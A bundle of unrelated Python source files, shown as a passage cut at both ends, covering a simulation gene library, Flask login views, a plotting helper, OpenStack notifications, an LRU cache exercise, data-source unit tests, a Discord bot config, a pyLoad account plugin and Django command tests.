* evolve_property_settings
and
* model_data: a list of dictionaries each describing the current state
of one of the nine Simulation objects, with the following format
{"params": sim.params,
"state": sim.state,
"global_stats": sim.global_stats,
"step": sim.step}
The functions ``save_session_data`` and ``load_session_data`` save and load
session data respectively for a given file path.
Gene library data:
Under LIB_PATH, there is a json file storing the parameters of all saved
simulations (called genes), their identifier string, and display locations
in the library window. In addition, thumbnail images for each simulation
are stored in separate png files under the same directory.
The json file has format:
{
"items": {
"hn90y8ws": some params...,
"h0suw44x": some params...
...
},
"loc": {
"0": "h0suw44x",
"3": "hn90y8ws",
...
}
}
The function ``random_string`` generates identifiers for genes to be
stored. ``load_params`` loads the json file from LIB_PARAMS_JSON_PATH.
``delete_gene`` removes the information associated with a given gene (its
png file and related entries in the json file). ``delete_all_genes``
deletes everything. ``save_gene`` saves a gene to files given its
parameters and figure.
"""
import json
import os
from random import choice
import numpy as np
from parameters import PARAM_INFO
LIB_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'libdata')
LIB_PARAMS_JSON_PATH = os.path.join(LIB_PATH, "params.json")
def fit_into(x, a, b):
return max(min(x, b), a)
def gene2params(gene):
"""Convert from gene format (for one cell type) to params format (for
three cell types)."""
adh = np.exp(np.tan(fit_into(gene["Adhesion"], -0.99, 0.99)*np.pi/2))
params = {
"Alignment Range": gene["Alignment Range"],
"Pinned Cells": ["none"] * 3,
"Interaction Force": gene["Interaction Force"],
"Gradient Intensity": [gene["Gradient Intensity"],
0.0,
0.0
],
"Cell Ratio": [1.0, 0.0, 0.0],
"Alignment Force": gene["Alignment Force"],
"Noise Intensity": gene["Noise Intensity"],
"Angular Inertia": gene["Angular Inertia"],
"Adhesion": [
[round(adh, PARAM_INFO["Adhesion"]["roundto"]), 0., 0.],
[0., 0., 0.],
[0., 0., 0.]
],
"Gradient Direction": [gene["Gradient Direction"], 0.0, 0.0],
"Cell Density": gene["Cell Density"],
"Velocity": [gene["Velocity"], 0., 0.],
"Interaction Range": gene["Interaction Range"]
}
# Rounding
for each in params:
if isinstance(params[each], list):
if isinstance(params[each][0], int) or isinstance(params[each][0], float):
params[each][0] = round(params[each][0], PARAM_INFO[each]["roundto"])
elif isinstance(params[each], int) or isinstance(params[each], float):
params[each] = round(params[each], PARAM_INFO[each]["roundto"])
return params
def load_from_files(input_file_name):
""" Load JSON and return params dictoinary."""
with open(input_file_name, "r") as infile:
temp = json.load(infile)
if "gene" in temp:
gene = temp["gene"]
elif "Gradient Intensity" in temp:
gene = temp
else:
raise IOError("Failed to open gene. This file does not have the correct format.")
return gene2params(gene)
def save_session_data(output_file_name, session_data):
"""Save session data to a json file."""
with open(output_file_name, 'w') as outfile:
json.dump(session_data, outfile)
def load_session_data(input_file_name):
"""Load and return session data from a json file."""
with open(input_file_name, "r") as infile:
session_data = json.load(infile)
return session_data
def random_string(length, allchar="0123456789abcdefghijklmnopqrstuvwxyz"):
"""Generate a random string to be used as identifier for saved genes."""
return "".join(choice(allchar) for _ in range(length))
def load_params(path):
"""Load and return gene library data from a json file. If the path does not
exist (library being empty), create a new empty dictionary."""
try:
with open(path, "r") as infile:
data = json.load(infile)
except (IOError, ValueError):
# If file fails to load, create new dictionary
data = {"items": {}, "loc": {}}
return data
def delete_all_genes():
"""Remove all library data by deleting all png files and the json file."""
try:
with open(LIB_PARAMS_JSON_PATH, "r") as infile:
data = json.load(infile)
except (IOError, ValueError):
return
for gene_id in data["items"]:
figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
os.remove(figure_path)
os.remove(LIB_PARAMS_JSON_PATH)
def delete_gene(gene_id):
"""Delete the png file associated a specific gene, and remove its entry
from the json file."""
try:
with open(LIB_PARAMS_JSON_PATH, "r") as infile:
data = json.load(infile)
except (IOError, ValueError):
return
# Move up locations following the deleted spot
flag = False
for i in range(len(data["items"])):
if flag:
data["loc"][str(i-1)] = data["loc"][str(i)]
else:
if data["loc"][str(i)] == gene_id:
flag = True
# Delete the last spot
data["loc"].pop(str(len(data["items"])-1))
# Delete from items
data["items"].pop(gene_id)
# Save json file
with open(LIB_PARAMS_JSON_PATH, 'w') as outfile:
json.dump(data, outfile, indent=4, separators=(',', ': '))
# Delete figure
figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
os.remove(figure_path)
def save_gene(params, fig):
"""Write a gene's information to files: save a thumbnail figure to png and
add an entry to the json parameters file."""
data = load_params(LIB_PARAMS_JSON_PATH)
# Generate new identifier, make sure it doesn't clash with ones that exist
gene_id = random_string(8)
while gene_id in data["items"]:
gene_id = random_string(8)
# Add entry and save json file
data["loc"][str(len(data["items"]))] = gene_id
data["items"][gene_id] = params
with open(LIB_PARAMS_JSON_PATH, 'w') as outfile:
json.dump(data, outfile, indent=4, separators=(',', ': '))
# Save figure
figure_path = os.path.join(LIB_PATH, "{}.png".format(gene_id))
fig.savefig(figure_path, edgecolor='w', facecolor='w', dpi=48)
|
"""Module to allow logins on the site."""
from flask import render_template, flash, redirect, url_for, session, abort, g
from .models import db, User
from .forms import AuthForm, RegisterForm
from . import app
import functools
def login_required(view):
"""Ensure the user can only see the login page initially."""
@functools.wraps(view)
def wrapped_view(**kwargs):
if g.user is None:
abort(404)
return view(**kwargs)
return wrapped_view
@app.before_request
def load_logged_in_user():
"""Get the user being logged in."""
user_id = session.get('user_id')
if user_id is None:
g.user = None
else:
g.user = User.query.get(user_id)
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Allow the user to register a new login."""
form = RegisterForm()
if form.validate_on_submit():
email = form.data['email']
password = form.data['password']
first_name = form.data['first_name']
last_name = form.data['last_name']
error = None
if not email or not password:
error = 'Invalid email or password'
if User.query.filter_by(email=email).first() is not None:
error = f'{email} has already been registered.'
if error is None:
user = User(
email=email,
password=password,
first_name=first_name,
last_name=last_name)
db.session.add(user)
db.session.commit()
flash('Registration complete. You may now log in.')
return redirect(url_for('.login'))
flash(error)
return render_template('auth/register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Authenticate user."""
form = AuthForm()
if form.validate_on_submit():
email = form.data['email']
password = form.data['password']
error = None
user = User.query.filter_by(email=email).first()
if user is None or not User.check_credentials(user, password):
error = 'Invalid username or password.'
if error is None:
session.clear()
session['user_id'] = user.id
return redirect(url_for('.portfolio'))
flash(error)
return render_template('auth/login.html', form=form)
@app.route('/logout')
def logout():
"""Log the user out."""
session.clear()
flash('Thanks for visiting!')
return redirect(url_for('.login'))
|
import matplotlib.pyplot as plt
import os
import pandas as pd
class Visualize():
def __init__(self, path_to_folder_of_assessment_file, path_to_folder_of_DBDs, output_folder, dbd_for_plot, task='boxplot'):
"""
:param path_to_folder_of_assessment_file: folder path from where assesment file should be taken
;param path_to_folder_of_DBDs: this folder should contain clustered DBD folders
:param output_folder: folder where visualization output should go
:param dbd_for_plot: path of dbd which is needed to be visualized
:param task: which visualization task needed. e.g., boxplot etc
"""
if os.path.exists(os.path.join(path_to_folder_of_assessment_file, 'quality_df.json')):
quality_df = pd.read_json(os.path.join(path_to_folder_of_assessment_file, 'quality_df.json'))
else:
print("Quality assesment file is not available. Please generate assessment by quality_cluster")
exit()
if 'boxplot' in task:
if 'all' in dbd_for_plot:
for x in sorted(os.listdir(path_to_folder_of_DBDs)):
if x.startswith("."):
continue
dbd_for_plot = os.path.join(path_to_folder_of_DBDs, x)
dbd_for_plot = dbd_for_plot + '/'
self.print_boxplot_dbd(quality_df, dbd_for_plot, output_folder)
else:
self.print_boxplot_dbd(quality_df, dbd_for_plot, output_folder)
print("You can see plots in ", output_folder)
@staticmethod
def print_boxplot_dbd(quality_df, plot_dbd, output_path):
if len(os.listdir(plot_dbd)) == 0:
# print("No pwms in ", plot_dbd)
return 1
dbd_to_plot = str(plot_dbd).split('/')[-2]
selected_dbd = quality_df.loc[quality_df['dbd'] == dbd_to_plot]
similarityMatrices = []
cluster_for_plotting = []
for row in range(len(selected_dbd)):
similarityMatrices.append(selected_dbd.iloc[row, 9])
cluster_for_plotting.append(str(row) + '(' + str(selected_dbd.iloc[row, 7]) + ')')
labels = cluster_for_plotting
if not len(labels):
return 1
fig, ax1 = plt.subplots(nrows=1, ncols=1, figsize=(24, 12))
# rectangular box plot
bplot1 = ax1.boxplot(similarityMatrices,
vert=True, # vertical box alignment
patch_artist=True, # fill with color
labels=labels) # will be used to label x-ticks
ax1.set_title('Rectangular box plot for ' + str(dbd_to_plot))
# fill with colors
# adding horizontal grid lines
for ax in [ax1]:
ax.yaxis.grid(True)
ax.set_xlabel('Clusters')
ax.set_ylabel('Observed Similarities')
# plt.show()
plt.xticks(rotation=45)
path_to_boxplots = output_path
if not os.path.exists(path_to_boxplots):
os.makedirs(path_to_boxplots, exist_ok=True)
plt.savefig(os.path.join(path_to_boxplots, dbd_to_plot + '_boxplot.png'))
plt.close()
if __name__ == "__main__":
# Visualize('../data/in/','../data/out/clustering_out/','../data/out/plots/boxplots/', 'all')
# # stamp comparison
# Visualize('../../../../../Desktop/PhD/Publication/Next/Clustering/in/',
# '../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/New/STAMP/',
# '../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/plots/boxplots/', 'all')
#abc4pwm comparison
Visualize('../../../../../Desktop/PhD/Publication/Next/Clustering/in/',
'../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/quality_assessed_out_abc4pwm_old/',
'../../../../../Desktop/PhD/Publication/Next/Clustering/Comparison/plots/abc4pwm/boxplots/', 'all')
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Notifications module for OpenStack Identity Service resources"""
from keystone.openstack.common import log
from keystone.openstack.common.notifier import api as notifier_api
LOG = log.getLogger(__name__)
class ManagerNotificationWrapper(object):
"""Send event notifications for ``Manager`` methods.
Sends a notification if the wrapped Manager method does not raise an
``Exception`` (such as ``keystone.exception.NotFound``).
:param resource_type: type of resource being affected
:param host: host of the resource (optional)
"""
def __init__(self, operation, resource_type, host=None):
self.operation = operation
self.resource_type = resource_type
self.host = host
def __call__(self, f):
def wrapper(*args, **kwargs):
"""Send a notification if the wrapped callable is successful."""
try:
result = f(*args, **kwargs)
except Exception:
raise
else:
_send_notification(
self.operation,
self.resource_type,
args[1], # f(self, resource_id, ...)
self.host)
return result
return wrapper
def created(*args, **kwargs):
"""Decorator to send notifications for ``Manager.create_*`` methods."""
return ManagerNotificationWrapper('created', *args, **kwargs)
def updated(*args, **kwargs):
"""Decorator to send notifications for ``Manager.update_*`` methods."""
return ManagerNotificationWrapper('updated', *args, **kwargs)
def deleted(*args, **kwargs):
"""Decorator to send notifications for ``Manager.delete_*`` methods."""
return ManagerNotificationWrapper('deleted', *args, **kwargs)
def _send_notification(operation, resource_type, resource_id, host=None):
"""Send notification to inform observers about the affected resource.
This method doesn't raise an exception when sending the notification fails.
:param operation: operation being performed (created, updated, or deleted)
:param resource_type: type of resource being operated on
:param resource_id: ID of resource being operated on
:param host: resource host
"""
context = {}
payload = {'resource_info': resource_id}
service = 'identity'
publisher_id = notifier_api.publisher_id(service, host=host)
event_type = '%(service)s.%(resource_type)s.%(operation)s' % {
'service': service,
'resource_type': resource_type,
'operation': operation}
try:
notifier_api.notify(
context, publisher_id, event_type, notifier_api.INFO, payload)
except Exception:
msg = (_('Failed to send %(res_id)s %(event_type)s notification') %
{'res_id': resource_id, 'event_type': event_type})
LOG.exception(msg)
|
from time import perf_counter_ns as ns
from collections import deque as dq
def solution(cacheSize, cities):
if not cacheSize:
return len(cities) * 5
ans = 0
q = dq([])
for c in cities:
c = c.lower()
if c not in q:
if len(q) == cacheSize:
q.popleft()
q.append(c)
ans += 5
else:
q.remove(c)
q.append(c)
ans += 1
return ans
if __name__ == '__main__':
ITERATIONS = 1_000
print(f'Running the basic tests {ITERATIONS:,} times...')
tests = (
(3, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "Jeju", "Pangyo",
"Seoul", "NewYork", "LA"], 50),
(3, ["Jeju", "Pangyo", "Seoul", "Jeju", "Pangyo", "Seoul", "Jeju",
"Pangyo", "Seoul"], 21),
(2, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "SanFrancisco",
"Seoul", "Rome", "Paris", "Jeju", "NewYork", "Rome"], 60),
(5, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA", "SanFrancisco",
"Seoul", "Rome", "Paris", "Jeju", "NewYork", "Rome"], 52),
(2, ["Jeju", "Pangyo", "NewYork", "newyork"], 16),
(0, ["Jeju", "Pangyo", "Seoul", "NewYork", "LA"], 25)
)
for size, cities, expected in tests:
print(f'solution({size}, {cities}) returned', end=' ')
if (result := solution(size, cities)) == expected:
print(f'the expected result {expected}', end=' ')
fastest = float('inf')
slowest = total = 0
for _ in range(ITERATIONS):
start = ns()
solution(size, cities)
end = ns()
time = end - start
fastest, slowest = min(time, fastest), max(time, slowest)
total += time
print(f'in an average of {total / ITERATIONS / 1e3:,.2f}μs '
f'(min: {fastest / 1e3:,.2f}μs, '
f'max: {slowest / 1e3:,.2f}μs)')
else:
print(f'a wrong result {result} (expected: {expected})')
|
"""Module containing tests for the index based Exports Site data source"""
import os
from collections import Iterator
from datetime import date, timedelta
from typing import Optional
from unittest import TestCase, main
from unittest.mock import patch, Mock, call
from selenium import webdriver
from judah.sources.export_site.index_based import IndexBasedExportSiteSource
_PARENT_FOLDER = os.path.dirname(__file__)
_MOCK_ASSET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.dirname(_PARENT_FOLDER)), 'assets')
class ChildIndexBasedExportSiteSource(IndexBasedExportSiteSource):
"""Child export site source that just picks a file from the file system"""
base_uri: str = 'http://example.com'
name: str = 'test_export_site_source'
def _download_file(self, current_option_index: int) -> Optional[str]:
"""Downloads the CSV from the export site and returns the path to it"""
return None
class TestIndexBasedExportSiteSource(TestCase):
"""Tests for the IndexBasedExportSiteSource"""
def setUp(self) -> None:
"""Initialize some variables"""
self.mock_csv_file_path = os.path.join(_MOCK_ASSET_FOLDER_PATH, 'mock.csv')
self.expected_data = [
{"Date": "09/03/2020", "number": "1", "period_from": "00:00", "period_until": "00:15", "Capacity": "16616"},
{"Date": "09/03/2020", "number": "2", "period_from": "00:15", "period_until": "00:30", "Capacity": "16616"},
{"Date": "09/03/2020", "number": "3", "period_from": "00:30", "period_until": "00:45", "Capacity": "16616"},
{"Date": "09/03/2020", "number": "4", "period_from": "00:45", "period_until": "01:00", "Capacity": "16620"},
]
@patch('judah.sources.export_site.index_based.visit_website')
def test_initialize_chrome(self, mock_visit_website):
"""
Should initialize Chrome in case it is not yet initialized and visits the base url
"""
index_based_export_site_source = ChildIndexBasedExportSiteSource()
self.assertIsNone(index_based_export_site_source.chrome)
index_based_export_site_source._initialize_chrome()
self.assertIsInstance(index_based_export_site_source.chrome, webdriver.Chrome)
mock_visit_website.assert_called_once_with(
driver=index_based_export_site_source.chrome, website_url=index_based_export_site_source.base_uri)
index_based_export_site_source.chrome.close()
index_based_export_site_source.chrome.quit()
@patch('judah.sources.export_site.index_based.delete_parent_folder')
@patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
@patch.object(ChildIndexBasedExportSiteSource, '_download_file')
def test_query_data_source(self, mock_download_file, mock_initialize_chrome, mock_delete_parent_folder):
"""
Should download all the files in the file list on the export site, one after the other,
and return an iterator with data records and then deletes folder
"""
# initializations
mock_download_file.return_value = self.mock_csv_file_path
number_of_files = 5
index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
# method call
response = index_based_export_site_source._query_data_source()
self.assertIsInstance(response, Iterator)
data = [record for record in response]
# assertions
mock_initialize_chrome.assert_called_once()
mock_download_file_calls = [call(current_option_index=index) for index in range(number_of_files)]
mock_download_file.assert_has_calls(mock_download_file_calls)
mock_delete_parent_folder_calls = [call(self.mock_csv_file_path) for index in range(number_of_files)]
mock_delete_parent_folder.assert_has_calls(mock_delete_parent_folder_calls)
records_from_all_files = []
for index in range(number_of_files):
records_from_all_files += self.expected_data.copy()
self.assertListEqual(data, records_from_all_files)
@patch('judah.sources.export_site.index_based.delete_parent_folder')
@patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
@patch.object(ChildIndexBasedExportSiteSource, '_download_file')
def test_query_data_source_no_file_downloaded(self, mock_download_file, mock_initialize_chrome,
mock_delete_parent_folder):
"""
Should return an empty iterator if there is no file downloaded
"""
# initializations
mock_download_file.return_value = None
number_of_files = 5
index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
# method call
response = index_based_export_site_source._query_data_source()
self.assertIsInstance(response, Iterator)
data = [record for record in response]
# assertions
mock_initialize_chrome.assert_called_once()
mock_download_file_calls = [call(current_option_index=index) for index in range(number_of_files)]
mock_download_file.assert_has_calls(mock_download_file_calls)
mock_delete_parent_folder.assert_not_called()
self.assertListEqual(data, [])
@patch.object(ChildIndexBasedExportSiteSource, '_initialize_chrome')
def test_del(self, mock_initialize_chrome):
"""
Should quit chrome on deletion
"""
index_based_export_site_source = ChildIndexBasedExportSiteSource()
index_based_export_site_source.chrome = Mock(spec=webdriver.Chrome)
index_based_export_site_source.__del__()
index_based_export_site_source.chrome.quit.assert_called_once()
@patch.object(ChildIndexBasedExportSiteSource, '_query_data_source')
def test_get(self, mock_query_data_source):
"""
Should return data from the list of files as an iterator
"""
mock_query_data_source.return_value = (record for record in self.expected_data)
number_of_files = 5
index_based_export_site_source = ChildIndexBasedExportSiteSource(number_of_indices=number_of_files)
response = index_based_export_site_source.get()
self.assertIsInstance(response, Iterator)
data = [record for record in response]
self.assertListEqual(data, self.expected_data)
if __name__ == '__main__':
main()
|
import logging, motor.motor_asyncio
from os import environ
from typing import NamedTuple
from dotenv import load_dotenv
import nextcord
import yarl
load_dotenv()
__all__ = (
"Algolia",
"Client",
"Colours",
"Database",
"Emojis",
"Icons",
"Stats",
"Tokens",
"RapidApi",
"RedirectOutput",
"ERROR_REPLIES",
"NEGATIVE_REPLIES",
"POSITIVE_REPLIES",
)
log = logging.getLogger(__name__)
class Client(NamedTuple):
name = "OpenSource BOT"
default_prefix = "t!"
guild_id="932264473408966656"
version = environ.get("GIT_SHA", "master")[:7]
bot_version="4.0.1"
token = environ.get("BOT_TOKEN")
debug = environ.get("BOT_DEBUG", "true").lower() == "true"
github_bot_repo = "https://github.com/abindent/Nextcord-Utility-Bot"
invite_permissions = nextcord.Permissions(
view_channel=True,
send_messages=True,
send_messages_in_threads=True,
manage_messages=True,
manage_threads=True,
embed_links=True,
attach_files=True,
read_message_history=True,
add_reactions=True,
use_external_emojis=True,
# these are enabled for future features, but not currently used
change_nickname=True,
create_public_threads=True,
create_private_threads=True,
view_audit_log=True,
)
DEBUG_MODE = Client.debug
class Algolia:
ALGOLIA_SEARCH_APP_ID= environ.get("ALGOLIA_SEARCH_APP_ID")
ALGOLIA_SEARCH_API_KEY= environ.get("ALGOLIA_SEARCH_API_KEY")
class Colours:
white = 0xFFFFFF
blue = 0x0279FD
bright_green = 0x01D277
dark_green = 0x1F8B4C
orange = 0xE67E22
pink = 0xCF84E0
purple = 0xB734EB
soft_green = 0x68C290
soft_orange = 0xF9CB54
soft_red = 0xCD6D6D
yellow = 0xF9F586
python_blue = 0x4B8BBE
python_yellow = 0xFFD43B
grass_green = 0x66FF00
gold = 0xE6C200
class Database:
connection_url = environ.get("MONGO_URI")
mongo = motor.motor_asyncio.AsyncIOMotorClient(str(connection_url))
db = mongo["pythonbot"]
class Emojis:
boxing_glove = "\U0001F94A"
cross_mark = "\u274C"
game_die = "\U0001F3B2"
sunny = "\u2600\ufe0f"
star = "\u2B50"
christmas_tree = "\U0001F384"
check = "\u2611"
envelope = "\U0001F4E8"
trashcan = "<:dustbin:949602736633167882>"
ok_hand = ":ok_hand:"
hand_raised = "\U0001F64B"
upload = "\U0001f4dd"
snekbox = "\U0001f40d"
member_join = "<:member_join:942985122846752798>"
number_emojis = {
1: "\u0031\ufe0f\u20e3",
2: "\u0032\ufe0f\u20e3",
3: "\u0033\ufe0f\u20e3",
4: "\u0034\ufe0f\u20e3",
5: "\u0035\ufe0f\u20e3",
6: "\u0036\ufe0f\u20e3",
7: "\u0037\ufe0f\u20e3",
8: "\u0038\ufe0f\u20e3",
9: "\u0039\ufe0f\u20e3",
}
confirmation = "\u2705"
decline = "\u274c"
x = "\U0001f1fd"
o = "\U0001f1f4"
resume = "<:emoji_1:900445170103889980>"
pause = "<:emoji_2:900445202899140648>"
loop = "<:emoji_7:900445329982369802>"
closeConnection = "<a:closeimout:848156958834032650>"
mute = "🔇"
halfvolume = "🔉"
fullvolume = "🔊"
FIRST_EMOJI = "\u23EE" # [:track_previous:]
LEFT_EMOJI = "\u2B05" # [:arrow_left:]
RIGHT_EMOJI = "\u27A1" # [:arrow_right:]
LAST_EMOJI = "\u23ED" # [:track_next:]
EMOJI_CODES = {
"green": {
"a": "<:a_green:952504070709575710>",
"b": "<:b_green:952504071737184276>",
"c": "<:c_green:952504072823521290>",
"d": "<:d_green:952504073016475709>",
"e": "<:e_green:952504073842749511>",
"f": "<:f_green:952504075277205514>",
"g": "<:g_green:952504077407903744>",
"h": "<:h_green:952504078011871245>",
"i": "<:i_green:952504079479894046>",
"j": "<:j_green:952504080171950120>",
"k": "<:k_green:952504084571783188>",
"l": "<:l_green:952504081912582184>",
"m": "<:m_green:952504086396276787>",
"n": "<:n_green:952504084408193044>",
"o": "<:o_green:952504085465141268>",
"p": "<:p_green:952504085507080213>",
"q": "<:q_green:952504087272890378>",
"r": "<:r_green:952504087851728966>",
"s": "<:s_green:952504311798169600>",
"t": "<:t_green:952504312498651137>",
"u": "<:u_green:952504312922255380>",
"v": "<:v_green:952504313761107988>",
"w": "<:w_green:952504314843250698>",
"x": "<:x_green:952504315799543859>",
"y": "<:y_green:952504316839755816>",
"z": "<:z_green:952504317770883132>",
},
"yellow": {
"a": "<:a_yellow:952504348628377650>",
"b": "<:b_yellow:952504349962170378>",
"c": "<:c_yellow:952504351002341376>",
"d": "<:d_yellow:952504351421775872>",
"e": "<:e_yellow:952504352239669308>",
"f": "<:f_yellow:952504352575209513>",
"g": "<:g_yellow:952504355418955776>",
"h": "<:h_yellow:952504357121830912>",
"i": "<:i_yellow:952504358048759808>",
"j": "<:j_yellow:952504363253899294>",
"k": "<:k_yellow:952504363220348938>",
"l": "<:l_yellow:952504359835541504>",
"m": "<:m_yellow:952504366668087336>",
"n": "<:n_yellow:952504363937579028>",
"o": "<:o_yellow:952504365028085840>",
"p": "<:p_yellow:952504365996974120>",
"q": "<:q_yellow:952504368240922635>",
"r": "<:r_yellow:952504368853319710>",
"s": "<:s_yellow:952504369453080576>",
"t": "<:t_yellow:952504370107396096>",
"u": "<:u_yellow:952504370753318983>",
"v": "<:v_yellow:952504371327946802>",
"w": "<:w_yellow:952504372460408853>",
"x": "<:x_yellow:952504373785813052>",
"y": "<:y_yellow:952504374876332102>",
"z": "<:z_yellow:952504375203491842>",
},
"gray": {
"a": "<:a_grey:952503991336574976>",
"b": "<:b_grey:952503992385175572>",
"c": "<:c_grey:952503993110777876>",
"d": "<:d_grey:952503993752498176>",
"e": "<:e_grey:952503994205495306>",
"f": "<:f_grey:952503994582966312>",
"g": "<:g_grey:952503997011492904>",
"h": "<:h_grey:952503998940860436>",
"i": "<:i_grey:952504000002031658>",
"j": "<:j_grey:952504000824090688>",
"k": "<:k_grey:952504006217986108>",
"l": "<:l_grey:952504003080650832>",
"m": "<:m_grey:952504004896784455>",
"n": "<:n_grey:952504005978906644>",
"o": "<:o_grey:952504006612250674>",
"p": "<:p_grey:952504007547564082>",
"q": "<:q_grey:952504008860377178>",
"r": "<:r_grey:952504009653108806>",
"s": "<:s_grey:952504009799917570>",
"t": "<:t_grey:952504010626195487>",
"u": "<:u_grey:952504011196616714>",
"v": "<:v_grey:952504011779616768>",
"w": "<:w_grey:952504012358451243>",
"x": "<:x_grey:952504012954013697>",
"y": "<:y_grey:952504013474123816>",
"z": "<:z_grey:952504013742571530>",
},
}
# Social
discord = "<:discord:942984508586725417>"
youtube = "<:youtube:942984508976795669>"
github = "<:github:942984509673066568>"
class Icons:
questionmark = "https://cdn.discordapp.com/emojis/512367613339369475.png"
bookmark = (
"https://images-ext-2.discordapp.net/external/zl4oDwcmxUILY7sD9ZWE2fU5R7n6QcxEmPYSE5eddbg/"
"%3Fv%3D1/https/cdn.discordapp.com/emojis/654080405988966419.png?width=20&height=20"
)
class RapidApi:
joke_api = environ.get("JOKE_API")
class RedirectOutput:
delete_delay: int = 10
class Source:
github = Client.github_bot_repo
github_avatar_url = "https://avatars1.githubusercontent.com/u/9919"
class Tokens(NamedTuple):
secret_id= environ.get("secret_id")
github = environ.get("GITHUB_TOKEN")
# Bot replies
ERROR_REPLIES = [
"Please don't do that.",
"You have to stop.",
"Do you mind?",
"In the future, don't do that.",
"That was a mistake.",
"You blew it.",
"You're bad at computers.",
"Are you trying to kill me?",
"Noooooo!!",
"I can't believe you've done this",
]
NEGATIVE_REPLIES = [
"Noooooo!!",
"Nope.",
"I'm sorry Dave, I'm afraid I can't do that.",
"I don't think so.",
"Not gonna happen.",
"Out of the question.",
"Huh? No.",
"Nah.",
"Naw.",
"Not likely.",
"No way, José.",
"Not in a million years.",
"Fat chance.",
"Certainly not.",
"NEGATORY.",
"Nuh-uh.",
"Not in my house!",
]
POSITIVE_REPLIES = [
"Yep.",
"Absolutely!",
"Can do!",
"Affirmative!",
"Yeah okay.",
"Sure.",
"Sure thing!",
"You're the boss!",
"Okay.",
"No problem.",
"I got you.",
"Alright.",
"You got it!",
"ROGER THAT",
"Of course!",
"Aye aye, cap'n!",
"I'll allow it.",
]
|
coeffs = np.polyfit(x, y, deg=3)
|
# -*- coding: utf-8 -*-
import hashlib
import json
import time
import pycurl
from ..base.multi_account import MultiAccount
def args(**kwargs):
return kwargs
class DebridlinkFr(MultiAccount):
__name__ = "DebridlinkFr"
__type__ = "account"
__version__ = "0.03"
__status__ = "testing"
__pyload_version__ = "0.5"
__config__ = [
("mh_mode", "all;listed;unlisted", "Filter hosters to use", "all"),
("mh_list", "str", "Hoster list (comma separated)", ""),
("mh_interval", "int", "Reload interval in hours", 12),
]
__description__ = """Debridlink.fr account plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]
API_URL = "https://debrid-link.fr/api"
def api_request(self, method, data=None, get={}, post={}):
session = self.info["data"].get("session", None)
if session:
ts = str(int(time.time() - float(session["tsd"])))
m = hashlib.sha1()
data = ts + method + session["key"]
m.update(data.encode())
sign = m.hexdigest()
self.req.http.c.setopt(
pycurl.HTTPHEADER,
[
"X-DL-TOKEN: " + session["token"],
"X-DL-SIGN: " + sign,
"X-DL-TS: " + ts,
],
)
json_data = self.load(self.API_URL + method, get=get, post=post)
return json.loads(json_data)
def grab_hosters(self, user, password, data):
res = self.api_request("/downloader/hostnames")
if res["result"] == "OK":
return res["value"]
else:
return []
def grab_info(self, user, password, data):
res = self.api_request("/account/infos")
if res["result"] == "OK":
premium = res["value"]["premiumLeft"] > 0
validuntil = res["value"]["premiumLeft"] + time.time()
else:
self.log_error(self._("Unable to retrieve account information"), res["ERR"])
validuntil = None
premium = None
return {"validuntil": validuntil, "trafficleft": -1, "premium": premium}
def signin(self, user, password, data):
cache_info = self.db.retrieve("cache_info", {})
if user in cache_info:
self.info["data"]["session"] = cache_info[user]
res = self.api_request("/account/infos")
if res["result"] == "OK":
self.skip_login()
else:
del cache_info[user]
self.db.store("cache_info", cache_info)
res = self.api_request(
"/account/login", post=args(pseudo=user, password=password)
)
if res["result"] != "OK":
self.fail_login()
cache_info[user] = {
"tsd": time.time() - float(res["ts"]),
"token": res["value"]["token"],
"key": res["value"]["key"],
}
self.info["data"]["session"] = cache_info[user]
self.db.store("cache_info", cache_info)
|
# Python
from __future__ import unicode_literals
import email.utils
# Django
import django
def test_site_notify_default(command_runner, mailoutbox, settings):
# Send to default recipients (admins).
assert settings.ADMINS
result = command_runner('site_notify')
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
expected_emails = set([x[1] for x in settings.ADMINS])
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_managers(command_runner, mailoutbox, settings):
# Send to addresses listed in settings.MANAGERS.
assert settings.MANAGERS
result = command_runner('site_notify', managers=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
expected_emails = set([x[1] for x in settings.MANAGERS])
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_superusers(user_model, super_user, inactive_super_user,
command_runner, mailoutbox):
# Send to active superusers.
result = command_runner('site_notify', superusers=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
users = user_model.objects.filter(is_active=True, is_superuser=True)
expected_emails = set(users.values_list('email', flat=True))
for recipient in msg.to:
realname, email_address = email.utils.parseaddr(recipient)
assert email_address in expected_emails
expected_emails.remove(email_address)
assert not expected_emails
def test_site_notify_staff(user_model, super_user, inactive_super_user,
staff_user, manager_staff_user, command_runner,
mailoutbox):
# Send to active staff users.
result = command_runner('site_notify', staff=True)
assert result[0] is None
assert len(mailoutbox) == 1
msg = mailoutbox[0]
